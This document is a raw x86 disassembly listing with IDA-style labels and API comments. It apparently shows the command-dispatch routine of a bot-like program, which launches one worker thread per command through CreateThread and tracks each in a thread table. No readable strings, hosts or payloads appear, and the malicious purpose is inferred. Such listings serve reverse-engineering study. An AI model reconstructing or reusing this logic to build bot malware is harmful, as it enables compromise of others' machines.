loc_40B432: ; CODE XREF: seg000:0040B753�j
; seg000:0040BD0D�j ...
lea eax, [ebp-2E4h]
push eax
call sub_41050B
add esp, 0Ch
loc_40B441: ; CODE XREF: seg000:0040B737�j
; seg000:0040BCF1�j ...
cmp [ebp-8], ebx
jnz short loc_40B462
push ebx
push dword ptr [ebp-4]
loc_40B44A: ; CODE XREF: seg000:0040C320�j
lea eax, [ebp-2E4h]
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
loc_40B45A: ; CODE XREF: seg000:0040D972�j
call sub_40E367
add esp, 14h
loc_40B462: ; CODE XREF: seg000:0040B444�j
; seg000:0040B886�j ...
lea eax, [ebp-2E4h]
push eax
call sub_407E0E
jmp loc_40E2D5
; ---------------------------------------------------------------------------
loc_40B473: ; CODE XREF: seg000:0040B42A�j
call ds:dword_41C04C ; GetTickCount
push eax
call sub_41055D
pop ecx
call sub_410567
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_410567
push 63h
cdq
pop ecx
idiv ecx
push edx
call sub_410567
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp-0C9Ch]
push edx
push eax
lea eax, [ebp-0B98h]
push offset dword_42BD94
push eax
call sub_41050B
lea eax, [ebp-0B98h]
push offset dword_42BD90
push eax
call sub_411B4E
add esp, 20h
cmp eax, ebx
mov [ebp+2Ch], eax
jz loc_40980B
push esi
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push dword ptr [ebp+20h]
push edi
push offset dword_42BD6C
push eax
call sub_41271D
push dword ptr [ebp+2Ch]
call sub_4119F0
lea eax, [ebp-0B98h]
push eax
lea eax, [ebp-3E4h]
push offset dword_42BD64
push eax
call sub_41050B
add esp, 2Ch
lea eax, [ebp-3E4h]
push ebx
push ebx
push eax
push offset dword_42BD5C
push offset dword_422D68
push ebx
call ds:dword_430714
test eax, eax
push edi
push esi
jz short loc_40B53D
push offset dword_42BD24
jmp short loc_40B542
; ---------------------------------------------------------------------------
loc_40B53D: ; CODE XREF: seg000:0040B534�j
push offset dword_42BCE4
loc_40B542: ; CODE XREF: seg000:0040B53B�j
call sub_41050B
add esp, 0Ch
cmp [ebp-8], ebx
jnz short loc_40B56B
push ebx
lea eax, [ebp-2E4h]
push dword ptr [ebp-4]
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
add esp, 14h
loc_40B56B: ; CODE XREF: seg000:0040B54D�j
lea eax, [ebp-2E4h]
push eax
call sub_407E0E
loc_40B577: ; CODE XREF: seg000:0040B59C�j
lea eax, [ebp-0B98h]
push 4
push eax
call sub_408661
add esp, 0Ch
test eax, eax
jz loc_40980B
lea eax, [ebp-0B98h]
push eax
call sub_4126F3
jmp short loc_40B577
; ---------------------------------------------------------------------------
loc_40B59E: ; CODE XREF: seg000:0040B3DB�j
; seg000:0040B3F2�j
push dword ptr [ebp+esi-8Ch]
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push dword ptr [ebp+20h]
call sub_410A7F
pop ecx
push eax
push edi
push dword ptr [ebp-8]
push dword ptr [ebp-4]
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_4048A1
jmp loc_40E145
; ---------------------------------------------------------------------------
loc_40B5CF: ; CODE XREF: seg000:0040B23E�j
; seg000:0040B255�j
mov esi, 80h
push edi
lea eax, [ebp-680h]
push esi
push eax
call sub_410A8A
lea eax, [ebp-680h]
push eax
push offset dword_41E3A4
call sub_410930
add esp, 14h
test eax, eax
jz short loc_40B632
lea eax, [ebp-680h]
push eax
push offset dword_41E3A0
call sub_410930
pop ecx
test eax, eax
pop ecx
jz short loc_40B632
lea eax, [ebp-680h]
push eax
push offset dword_41E398
call sub_410930
pop ecx
test eax, eax
pop ecx
jz short loc_40B632
push offset dword_42BCA8
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_40B632: ; CODE XREF: seg000:0040B5F8�j
; seg000:0040B60F�j ...
push dword ptr [ebp+10h]
call sub_410A7F
cmp eax, ebx
pop ecx
mov [ebp-578h], eax
jle loc_40B758
push edi
lea eax, [ebp-680h]
push esi
push eax
call sub_410A8A
push dword ptr [ebp+20h]
lea eax, [ebp-700h]
push esi
push eax
call sub_410A8A
push dword ptr [ebp+8]
call sub_410A7F
mov [ebp-57Ch], eax
xor eax, eax
cmp [ebp-9A2h], bl
push dword ptr [ebp-98h]
setnz al
mov [ebp-574h], eax
mov eax, [ebp+0Ch]
mov [ebp-704h], eax
lea eax, [ebp-600h]
push esi
push eax
call sub_410A8A
mov eax, [ebp-4]
add esp, 28h
cmp [ebp-574h], ebx
mov [ebp-570h], eax
mov eax, [ebp-8]
mov [ebp-56Ch], eax
mov eax, offset dword_42BCA0
jnz short loc_40B6C9
mov eax, offset dword_42BC98
loc_40B6C9: ; CODE XREF: seg000:0040B6C2�j
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push dword ptr [ebp+20h]
push edi
push eax
push offset dword_42BC50
lea eax, [ebp-2E4h]
push 200h
push eax
call sub_410A8A
push ebx
lea eax, [ebp-2E4h]
push 0Ch
push eax
call sub_40FFB7
add esp, 2Ch
mov [ebp-580h], eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-704h]
push ebx
push eax
push offset loc_401BD6
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp-580h]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_40B747
loc_40B731: ; CODE XREF: seg000:0040B745�j
cmp [ebp-568h], ebx
jnz loc_40B441
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_40B731
; ---------------------------------------------------------------------------
loc_40B747: ; CODE XREF: seg000:0040B72F�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
push offset dword_42BC04
jmp loc_40B432
; ---------------------------------------------------------------------------
loc_40B758: ; CODE XREF: seg000:0040B643�j
push offset dword_42BBB8
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_40B762: ; CODE XREF: seg000:0040B1F9�j
; seg000:0040B210�j ...
cmp ds:dword_430880, ebx
mov esi, [ebp+0Ch]
jnz loc_40B86A
mov eax, [ebp-8]
push 7Fh
mov [ebp-2ECh], eax
mov eax, [ebp-4]
mov [ebp-2F0h], eax
lea eax, [ebp-384h]
push edi
push eax
call sub_411D00
push dword ptr [ebp+20h]
call sub_410A7F
push dword ptr [ebp+8]
mov [ebp-304h], eax
call sub_410A7F
push dword ptr [ebp+10h]
mov [ebp-300h], eax
call sub_410A7F
push 7Fh
mov [ebp-2FCh], eax
push dword ptr [ebp-98h]
lea eax, [ebp-404h]
push eax
call sub_411D00
push dword ptr [ebp-2FCh]
lea eax, [ebp-384h]
mov [ebp-408h], esi
push dword ptr [ebp-300h]
push eax
lea eax, [ebp-2E4h]
push dword ptr [ebp-304h]
push offset dword_42BB5C
push eax
call sub_41050B
push ebx
lea eax, [ebp-2E4h]
push 0Eh
push eax
call sub_40FFB7
add esp, 48h
mov [ebp-2F4h], eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-408h]
push ebx
push eax
push offset loc_4074DB
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp-2F4h]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_40B859
loc_40B847: ; CODE XREF: seg000:0040B857�j
cmp [ebp-2E8h], ebx
jnz short loc_40B883
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_40B847
; ---------------------------------------------------------------------------
loc_40B859: ; CODE XREF: seg000:0040B845�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
push offset dword_42BB10
jmp loc_40C419
; ---------------------------------------------------------------------------
loc_40B86A: ; CODE XREF: seg000:0040B76B�j
push 1FFh
lea eax, [ebp-2E4h]
push offset dword_42BAF8
push eax
call sub_411D00
loc_40B880: ; CODE XREF: seg000:0040C425�j
add esp, 0Ch
loc_40B883: ; CODE XREF: seg000:0040B84D�j
; seg000:0040B997�j ...
cmp [ebp-8], ebx
jnz loc_40B462
push ebx
push dword ptr [ebp-4]
jmp loc_40D964
; ---------------------------------------------------------------------------
loc_40B895: ; CODE XREF: seg000:0040B1B4�j
; seg000:0040B1CB�j ...
mov eax, [ebp-8]
push 7Fh
mov [ebp-2ECh], eax
mov eax, [ebp-4]
mov [ebp-2F0h], eax
lea eax, [ebp-384h]
push edi
push eax
call sub_411D00
push dword ptr [ebp+20h]
call sub_410A7F
push dword ptr [ebp+8]
mov [ebp-304h], eax
call sub_410A7F
push dword ptr [ebp+10h]
mov [ebp-300h], eax
call sub_410A7F
mov esi, [ebp+esi-8Ch]
add esp, 18h
cmp esi, ebx
mov [ebp-2FCh], eax
jz short loc_40B8FD
push esi
call sub_410A7F
pop ecx
mov [ebp-2F8h], eax
jmp short loc_40B903
; ---------------------------------------------------------------------------
loc_40B8FD: ; CODE XREF: seg000:0040B8EC�j
mov [ebp-2F8h], ebx
loc_40B903: ; CODE XREF: seg000:0040B8FB�j
push 7Fh
lea eax, [ebp-404h]
push dword ptr [ebp-98h]
push eax
call sub_411D00
push dword ptr [ebp-2FCh]
mov esi, [ebp+0Ch]
lea eax, [ebp-384h]
mov [ebp-408h], esi
push dword ptr [ebp-300h]
push eax
lea eax, [ebp-2E4h]
push dword ptr [ebp-304h]
push offset dword_42BA9C
push eax
call sub_41050B
push ebx
lea eax, [ebp-2E4h]
push 0Fh
push eax
call sub_40FFB7
add esp, 30h
mov [ebp-2F4h], eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-408h]
push ebx
push eax
push offset loc_407667
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp-2F4h]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_40B9A7
loc_40B991: ; CODE XREF: seg000:0040B9A5�j
cmp [ebp-2E8h], ebx
jnz loc_40B883
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_40B991
; ---------------------------------------------------------------------------
loc_40B9A7: ; CODE XREF: seg000:0040B98F�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
push offset dword_42BA50
jmp loc_40C419
; ---------------------------------------------------------------------------
loc_40B9B8: ; CODE XREF: seg000:0040B186�j
; seg000:0040B19D�j
push 8
call sub_4101FF
push dword ptr [ebp+20h]
mov [ebp+18h], eax
call sub_410A7F
add eax, [ebp+18h]
pop ecx
pop ecx
cmp eax, 12Ch
jle short loc_40BA08
push dword ptr [ebp+18h]
lea eax, [ebp-2E4h]
push offset dword_42B9FC
push eax
call sub_41050B
push ebx
lea eax, [ebp-2E4h]
push dword ptr [ebp-4]
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
jmp loc_40CD7A
; ---------------------------------------------------------------------------
loc_40BA08: ; CODE XREF: seg000:0040B9D4�j
push edi
call sub_410A7F
push dword ptr [ebp+20h]
mov [ebp-31Ch], eax
call sub_410A7F
push dword ptr [ebp+8]
mov [ebp-304h], eax
call sub_410A7F
add esp, 0Ch
cmp eax, 1
mov [ebp-318h], eax
jnb short loc_40BA41
push 1
pop eax
mov [ebp-318h], eax
loc_40BA41: ; CODE XREF: seg000:0040BA36�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_40BA4E
mov [ebp-318h], ecx
loc_40BA4E: ; CODE XREF: seg000:0040BA46�j
push dword ptr [ebp+10h]
call sub_410A7F
cmp eax, 1F4h
pop ecx
mov [ebp-314h], eax
jbe short loc_40BA6E
mov dword ptr [ebp-314h], 1F4h
loc_40BA6E: ; CODE XREF: seg000:0040BA62�j
or dword ptr [ebp-300h], 0FFFFFFFFh
cmp ds:dword_41FFE8, ebx
mov [ebp+10h], ebx
jz short loc_40BAC4
mov dword ptr [ebp+2Ch], offset dword_41FFE8
loc_40BA87: ; CODE XREF: seg000:0040BAA6�j
mov eax, [ebp+2Ch]
push edi
add eax, 0FFFFFFD8h
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jz short loc_40BAAA
add dword ptr [ebp+2Ch], 3Ch
inc dword ptr [ebp+10h]
mov eax, [ebp+2Ch]
cmp [eax], ebx
jnz short loc_40BA87
jmp short loc_40BAC4
; ---------------------------------------------------------------------------
loc_40BAAA: ; CODE XREF: seg000:0040BA98�j
mov eax, [ebp+10h]
mov ecx, eax
mov [ebp-300h], eax
imul ecx, 3Ch
mov ecx, ds:dword_41FFE8[ecx]
mov [ebp-31Ch], ecx
loc_40BAC4: ; CODE XREF: seg000:0040BA7E�j
; seg000:0040BAA8�j
cmp [ebp-31Ch], ebx
jz loc_40D679
mov edi, [ebp+esi-8Ch]
cmp edi, ebx
mov [ebp+20h], edi
jz short loc_40BB0E
cmp byte ptr [edi], 23h
jz short loc_40BB0E
push edi
lea eax, [ebp-430h]
push 10h
push eax
call sub_410A8A
push 78h
push edi
call sub_412760
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp-2F0h], eax
jmp loc_40BBE2
; ---------------------------------------------------------------------------
loc_40BB0E: ; CODE XREF: seg000:0040BADC�j
; seg000:0040BAE1�j
cmp [ebp-9B3h], bl
jnz short loc_40BB30
cmp [ebp-9B2h], bl
jnz short loc_40BB30
cmp [ebp-9A2h], bl
jnz short loc_40BB30
push offset dword_42B9B0
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_40BB30: ; CODE XREF: seg000:0040BB14�j
; seg000:0040BB1C�j ...
push 10h
lea eax, [ebp+8]
pop edi
push eax
lea eax, [ebp-0D8h]
push eax
mov [ebp+8], edi
push dword ptr [ebp+0Ch]
call ds:dword_43073C
mov al, [ebp-9B3h]
push edi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp-0D4h], eax
push dword ptr [ebp-0D4h]
call ds:dword_43081C
push eax
lea eax, [ebp-430h]
push eax
call sub_411D00
add esp, 0Ch
cmp [ebp-9A2h], bl
jz short loc_40BBDC
xor eax, eax
cmp [ebp-9B3h], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp-430h]
push eax
call sub_412000
pop ecx
cmp edi, ebx
pop ecx
mov [ebp+2Fh], bl
jle short loc_40BBD0
loc_40BBAE: ; CODE XREF: seg000:0040BBCE�j
cmp eax, ebx
jz short loc_40BBD0
mov byte ptr [eax], 78h
lea eax, [ebp-430h]
push 30h
push eax
call sub_412000
inc byte ptr [ebp+2Fh]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+2Fh]
cmp ecx, edi
jl short loc_40BBAE
loc_40BBD0: ; CODE XREF: seg000:0040BBAC�j
; seg000:0040BBB0�j
mov dword ptr [ebp-2F0h], 1
jmp short loc_40BBE2
; ---------------------------------------------------------------------------
loc_40BBDC: ; CODE XREF: seg000:0040BB86�j
mov [ebp-2F0h], ebx
loc_40BBE2: ; CODE XREF: seg000:0040BB09�j
; seg000:0040BBDA�j
mov eax, [ebp+0Ch]
push dword ptr [ebp-98h]
mov [ebp-320h], eax
mov eax, [ebp-4]
mov [ebp-2F8h], eax
mov eax, [ebp-8]
mov [ebp-2F4h], eax
mov edi, 80h
lea eax, [ebp-420h]
push edi
push eax
call sub_410A8A
mov esi, [ebp+esi-88h]
add esp, 0Ch
cmp esi, ebx
jz short loc_40BC36
loc_40BC23: ; CODE XREF: seg000:0040BC59�j
push esi
loc_40BC24: ; CODE XREF: seg000:0040BC43�j
lea eax, [ebp-3A0h]
push edi
push eax
call sub_410A8A
add esp, 0Ch
jmp short loc_40BC61
; ---------------------------------------------------------------------------
loc_40BC36: ; CODE XREF: seg000:0040BC21�j
mov eax, [ebp+20h]
cmp eax, ebx
jz short loc_40BC45
cmp byte ptr [eax], 23h
jnz short loc_40BC45
push eax
jmp short loc_40BC24
; ---------------------------------------------------------------------------
loc_40BC45: ; CODE XREF: seg000:0040BC3B�j
; seg000:0040BC40�j
mov esi, offset dword_4230B4
push offset dword_42F3E8
push esi
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40BC23
mov [ebp-3A0h], bl
loc_40BC61: ; CODE XREF: seg000:0040BC34�j
cmp [ebp-2F0h], ebx
mov eax, offset dword_42B9A8
jnz short loc_40BC73
mov eax, offset dword_42B99C
loc_40BC73: ; CODE XREF: seg000:0040BC6C�j
push dword ptr [ebp-304h]
lea ecx, [ebp-430h]
push dword ptr [ebp-314h]
push dword ptr [ebp-318h]
push dword ptr [ebp-31Ch]
push ecx
push eax
lea eax, [ebp-2E4h]
push offset dword_42B924
push eax
call sub_41050B
push ebx
lea eax, [ebp-2E4h]
push 8
push eax
call sub_40FFB7
add esp, 2Ch
mov [ebp-310h], eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-430h]
push ebx
push eax
push 405723h
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp-310h]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_40BD01
loc_40BCEB: ; CODE XREF: seg000:0040BCFF�j
cmp [ebp-2ECh], ebx
jnz loc_40B441
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_40BCEB
; ---------------------------------------------------------------------------
loc_40BD01: ; CODE XREF: seg000:0040BCE9�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
push offset dword_42B8D8
jmp loc_40B432
; ---------------------------------------------------------------------------
loc_40BD12: ; CODE XREF: seg000:0040B146�j
; seg000:0040B15D�j
push edi
call sub_410A7F
imul eax, 234h
pop ecx
cmp ds:byte_4358F0[eax], bl
jz loc_40E148
cmp [ebp-0Ch], ebx
jz loc_40E148
push edi
call sub_410B60
push dword ptr [ebp+18h]
mov esi, eax
call sub_410B60
push dword ptr [ebp+20h]
add esi, eax
call sub_410B60
add eax, [ebp-0Ch]
push dword ptr [ebp+8]
lea eax, [eax+esi+2]
push eax
call sub_410AE0
mov esi, eax
lea eax, [ebp-2E4h]
push esi
push offset dword_42B8CC
push eax
call sub_41050B
add esp, 20h
cmp esi, ebx
jz loc_40E148
push edi
call sub_410A7F
test eax, eax
pop ecx
jle loc_40E148
push edi
call sub_410A7F
cmp eax, 12Ch
pop ecx
jge loc_40E148
push ebx
lea eax, [ebp-2E4h]
push ebx
push eax
push dword ptr [ebp+20h]
push edi
call sub_410A7F
imul eax, 234h
pop ecx
push ds:dword_4358E4[eax]
call sub_40E367
push edi
call sub_410A7F
imul eax, 234h
add esp, 18h
cmp byte ptr ds:dword_4356D8[eax], 73h
jnz loc_40E148
push esi
push edi
call sub_410A7F
imul eax, 234h
pop ecx
add eax, offset byte_4358F0
push eax
push dword ptr [ebp+20h]
push offset dword_42B8BC
loc_40BDFA: ; CODE XREF: seg000:0040BEF4�j
lea eax, [ebp-2E4h]
push eax
call sub_41050B
push ebx
lea eax, [ebp-2E4h]
push dword ptr [ebp-4]
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
jmp loc_40DAF6
; ---------------------------------------------------------------------------
loc_40BE24: ; CODE XREF: seg000:0040B118�j
; seg000:0040B12F�j
push edi
call sub_410A7F
imul eax, 234h
pop ecx
cmp ds:byte_4358F0[eax], bl
jz loc_40E148
cmp [ebp-0Ch], ebx
jz loc_40E148
push edi
call sub_410B60
push dword ptr [ebp+18h]
mov esi, eax
call sub_410B60
push dword ptr [ebp+20h]
add esi, eax
call sub_410B60
add eax, [ebp-0Ch]
push dword ptr [ebp+8]
lea eax, [eax+esi+2]
push eax
call sub_410AE0
mov esi, eax
add esp, 14h
cmp esi, ebx
jz loc_40E148
push edi
call sub_410A7F
test eax, eax
pop ecx
jle loc_40E148
push edi
call sub_410A7F
cmp eax, 12Ch
pop ecx
jge loc_40E148
push ebx
push ebx
push esi
push dword ptr [ebp+20h]
push edi
call sub_410A7F
imul eax, 234h
pop ecx
push ds:dword_4358E4[eax]
call sub_40E367
push edi
call sub_410A7F
imul eax, 234h
add esp, 18h
cmp byte ptr ds:dword_4356D8[eax], 73h
jnz loc_40E148
push esi
push edi
call sub_410A7F
imul eax, 234h
pop ecx
add eax, offset byte_4358F0
push eax
push dword ptr [ebp+20h]
push offset dword_42B8AC
jmp loc_40BDFA
; ---------------------------------------------------------------------------
loc_40BEF9: ; CODE XREF: seg000:0040B0EA�j
; seg000:0040B101�j
push edi
call ds:dword_4307D0
push dword ptr [ebp+20h]
mov [ebp-47Ch], eax
call sub_410A7F
push dword ptr [ebp+8]
mov [ebp-488h], eax
call sub_410A7F
mov esi, [ebp+0Ch]
push 7Fh
push dword ptr [ebp-98h]
mov [ebp-484h], eax
lea eax, [ebp-508h]
mov [ebp-50Ch], esi
push eax
call sub_411D00
add esp, 14h
mov edi, [ebp-4]
mov eax, [ebp-8]
mov [ebp-474h], edi
push dword ptr [ebp-484h]
mov [ebp-470h], eax
push dword ptr [ebp-488h]
push dword ptr [ebp-47Ch]
call ds:dword_43081C
push eax
lea eax, [ebp-2E4h]
push offset dword_42B85C
push eax
call sub_41050B
push ebx
lea eax, [ebp-2E4h]
push 8
push eax
call sub_40FFB7
add esp, 20h
mov [ebp-480h], eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-50Ch]
push ebx
push eax
push offset sub_40FB84
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp-480h]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_40BFDB
loc_40BFC5: ; CODE XREF: seg000:0040BFD9�j
cmp [ebp-46Ch], ebx
jnz loc_40D959
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_40BFC5
; ---------------------------------------------------------------------------
loc_40BFDB: ; CODE XREF: seg000:0040BFC3�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
push offset dword_42B80C
jmp loc_40D94A
; ---------------------------------------------------------------------------
loc_40BFEC: ; CODE XREF: seg000:0040B0BC�j
; seg000:0040B0D3�j
push edi
call sub_410A7F
push 7Fh
mov [ebp-300h], eax
push dword ptr [ebp+20h]
lea eax, [ebp-404h]
push eax
call sub_411D00
push dword ptr [ebp+8]
call sub_410A7F
push dword ptr [ebp-98h]
mov esi, [ebp+0Ch]
mov [ebp-304h], eax
lea eax, [ebp-384h]
push 80h
push eax
mov [ebp-40Ch], esi
call sub_410A8A
mov eax, [ebp-8]
add esp, 20h
mov edi, [ebp-4]
mov [ebp-2F0h], eax
push dword ptr [ebp-304h]
lea eax, [ebp-404h]
mov [ebp-2F4h], edi
push eax
push dword ptr [ebp-300h]
push esi
call sub_407435
pop ecx
push eax
lea eax, [ebp-2E4h]
push offset dword_42B7BC
push eax
call sub_41050B
push ebx
lea eax, [ebp-2E4h]
push 10h
push eax
call sub_40FFB7
add esp, 24h
mov [ebp-2FCh], eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-40Ch]
push ebx
push eax
push offset sub_405982
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp-2FCh]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_40C0D5
loc_40C0BF: ; CODE XREF: seg000:0040C0D3�j
cmp [ebp-2ECh], ebx
jnz loc_40D959
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_40C0BF
; ---------------------------------------------------------------------------
loc_40C0D5: ; CODE XREF: seg000:0040C0BD�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
push offset dword_42B768
jmp loc_40D94A
; ---------------------------------------------------------------------------
loc_40C0E6: ; CODE XREF: seg000:0040B08E�j
; seg000:0040B0A5�j
push 0FFh
lea eax, [ebp-788h]
push edi
push eax
call sub_411D00
push 0FFh
lea eax, [ebp-688h]
push dword ptr [ebp+20h]
push eax
call sub_411D00
push dword ptr [ebp+8]
mov [ebp-584h], ebx
call sub_410A7F
mov [ebp-580h], eax
mov eax, [ebp+esi-90h]
add esp, 1Ch
cmp eax, ebx
jz short loc_40C142
push 10h
push ebx
push eax
call sub_4118C9
add esp, 0Ch
mov [ebp-578h], eax
jmp short loc_40C148
; ---------------------------------------------------------------------------
loc_40C142: ; CODE XREF: seg000:0040C12C�j
mov [ebp-578h], ebx
loc_40C148: ; CODE XREF: seg000:0040C140�j
mov esi, [ebp+esi-8Ch]
cmp esi, ebx
jz short loc_40C162
push esi
call sub_410A7F
pop ecx
mov [ebp-57Ch], eax
jmp short loc_40C168
; ---------------------------------------------------------------------------
loc_40C162: ; CODE XREF: seg000:0040C151�j
mov [ebp-57Ch], ebx
loc_40C168: ; CODE XREF: seg000:0040C160�j
movzx eax, byte ptr [ebp-9AFh]
mov esi, [ebp+0Ch]
push 7Fh
push dword ptr [ebp-98h]
mov [ebp-574h], eax
lea eax, [ebp-808h]
mov [ebp-80Ch], esi
push eax
call sub_411D00
mov eax, [ebp-4]
push dword ptr [ebp+20h]
mov [ebp-56Ch], eax
mov eax, [ebp-8]
mov [ebp-570h], eax
push edi
lea eax, [ebp-2E4h]
push offset dword_42B728
push eax
call sub_41050B
push esi
lea eax, [ebp-2E4h]
push 15h
push eax
call sub_40FFB7
add esp, 28h
mov [ebp-588h], eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-80Ch]
push ebx
push eax
push offset loc_408152
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp-588h]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_40C216
loc_40C200: ; CODE XREF: seg000:0040C214�j
cmp [ebp-568h], ebx
jnz loc_40B883
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_40C200
; ---------------------------------------------------------------------------
loc_40C216: ; CODE XREF: seg000:0040C1FE�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
push offset dword_42B6D4
jmp loc_40C419
; ---------------------------------------------------------------------------
loc_40C227: ; CODE XREF: seg000:0040B060�j
; seg000:0040B077�j
push 7Fh
lea eax, [ebp-774h]
pop esi
push esi
push edi
push eax
call sub_411D00
push esi
lea eax, [ebp-6F4h]
push dword ptr [ebp+20h]
push eax
call sub_411D00
push esi
lea eax, [ebp-674h]
push dword ptr [ebp+8]
push eax
call sub_411D00
push esi
lea eax, [ebp-5F4h]
push dword ptr [ebp-98h]
push eax
call sub_411D00
mov eax, [ebp-8]
push dword ptr [ebp+8]
mov esi, [ebp-4]
mov [ebp-56Ch], eax
mov eax, [ebp+0Ch]
push dword ptr [ebp+20h]
mov [ebp-778h], eax
lea eax, [ebp-2E4h]
push edi
push offset dword_42B694
push eax
mov [ebp-570h], esi
call sub_41050B
add esp, 44h
lea eax, [ebp-2E4h]
push ebx
push 0Bh
push eax
call sub_40FFB7
add esp, 0Ch
mov [ebp-574h], eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-778h]
push ebx
push eax
push offset sub_40182E
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp-574h]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_40C2FA
loc_40C2E8: ; CODE XREF: seg000:0040C2F8�j
cmp [ebp-568h], ebx
jnz short loc_40C315
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_40C2E8
; ---------------------------------------------------------------------------
loc_40C2FA: ; CODE XREF: seg000:0040C2E6�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
lea eax, [ebp-2E4h]
push offset dword_42B648
push eax
call sub_41050B
add esp, 0Ch
loc_40C315: ; CODE XREF: seg000:0040C2EE�j
cmp [ebp-8], ebx
jnz loc_40B462
push ebx
push esi
jmp loc_40B44A
; ---------------------------------------------------------------------------
loc_40C325: ; CODE XREF: seg000:0040B01B�j
; seg000:0040B032�j ...
push 7Fh
lea eax, [ebp-7F0h]
pop esi
push esi
push edi
push eax
call sub_411D00
push esi
lea eax, [ebp-770h]
push dword ptr [ebp+20h]
push eax
call sub_411D00
push esi
lea eax, [ebp-6F0h]
push dword ptr [ebp+8]
push eax
call sub_411D00
push esi
lea eax, [ebp-670h]
push dword ptr [ebp-98h]
push eax
call sub_411D00
push 20h
lea eax, [ebp-5F0h]
push dword ptr [ebp+18h]
push eax
call sub_411D00
mov eax, [ebp-4]
push dword ptr [ebp+8]
mov esi, [ebp+0Ch]
mov [ebp-570h], eax
mov eax, [ebp-8]
push dword ptr [ebp+20h]
mov [ebp-56Ch], eax
lea eax, [ebp-2E4h]
push edi
push offset dword_42B604
push eax
mov [ebp-7F8h], esi
call sub_41050B
add esp, 50h
lea eax, [ebp-2E4h]
push ebx
push 0Ah
push eax
call sub_40FFB7
add esp, 0Ch
mov [ebp-7F4h], eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-7F8h]
push ebx
push eax
push offset start
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp-7F4h]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_40C40D
loc_40C3F7: ; CODE XREF: seg000:0040C40B�j
cmp [ebp-568h], ebx
jnz loc_40B883
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_40C3F7
; ---------------------------------------------------------------------------
loc_40C40D: ; CODE XREF: seg000:0040C3F5�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
push offset dword_42B5B8
loc_40C419: ; CODE XREF: seg000:0040B865�j
; seg000:0040B9B3�j ...
lea eax, [ebp-2E4h]
push eax
call sub_41050B
jmp loc_40B880
; ---------------------------------------------------------------------------
loc_40C42A: ; CODE XREF: seg000:0040AFED�j
; seg000:0040B004�j
push 7Fh
lea eax, [ebp-444h]
push edi
push eax
call sub_411D00
push dword ptr [ebp+20h]
call sub_410A7F
push 3Fh
mov [ebp-2F4h], eax
push dword ptr [ebp+8]
lea eax, [ebp-3C4h]
push eax
call sub_411D00
mov esi, [ebp+esi-90h]
add esp, 1Ch
cmp esi, ebx
jz short loc_40C478
